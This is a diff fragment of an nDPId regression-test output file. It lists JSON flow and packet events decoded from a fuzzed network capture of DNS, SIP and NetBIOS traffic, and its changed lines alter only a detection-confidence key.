00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1120469847667,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469847667,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0ARz61yNiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwmEb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847669,"flow_last_seen":1120469847669,"flow_idle_time":620000,"flow_min_l4_payload_len":475,"flow_max_l4_payload_len":475,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":1120469847669,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":120,"flow_datalink":1,"flow_max_packets":3} 01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1120469847669,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469847669,"pkt":"ADBUADRWAODtAVK9CABFAAHvaiZJAIB4FxjAqAEC1PIhIxPEE8QB25tyUkVmSVNURVIgc2lZOnNpcC5jeWJlckdpdHkyZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTZxJXMAMjticmFuY2g9ejloRzRiS25wMTIzNzU5MDYzLTQ2NGJjMWJiMTkyLjE2OC4xLjI7cpdvcnQNaUZyb206IDxzaXA6dm9pMTgwNjJAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTc2MDY5ZTQNClRvOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHkuZGs+QwpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1120469847979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469847979,"pkt":"ADBUADRWAODtAW69CABFAABIaicAAIARTSrAqAECwKgBAQquADUANKw8fdoBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1120469848977,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469848977,"pkt":"ADBUADRWAODtAW69CABFAABIaigAAIARTSmsqAECwKgBAQquADUANKw8fdoBAAABAAAA4wAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1120469850980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469850980,"pkt":"ADBUADRWAODtAW69CABFAABIaikAAFIRTSjAqAECwKgBAQquADUANKw8fdoBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJYaXR5AmRrAAAhAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469847979,"flow_last_seen":1120469850980,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469850980,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberxity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469847979,"flow_last_seen":1120469850980,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469850980,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberxity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1120469852983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469852983,"pkt":"ADBUADRWAODtAW69CABFAABIaioAAIARTSfAqAECwKgBAQquADUANKw8Q9oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469847979,"flow_last_seen":1120469852983,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469852983,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469847979,"flow_last_seen":1120469852983,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469852983,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1120469864991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469864991,"pkt":"ADBUADRWAODtAW69CABFAABEakEAAIARTSnIqAECwKgBAQqvADUAMDE089sAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRzBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1120469864992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469864992,"pkt":"AODzAW69ADBUADRWCABFAABbAABAAEARtz79qAEBwKgBAgA1Cq8ARxOw89uAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469681446,"flow_last_seen":1120469689458,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -259,185 +259,185 @@ 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469681446,"flow_last_seen":1120469689458,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469877188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 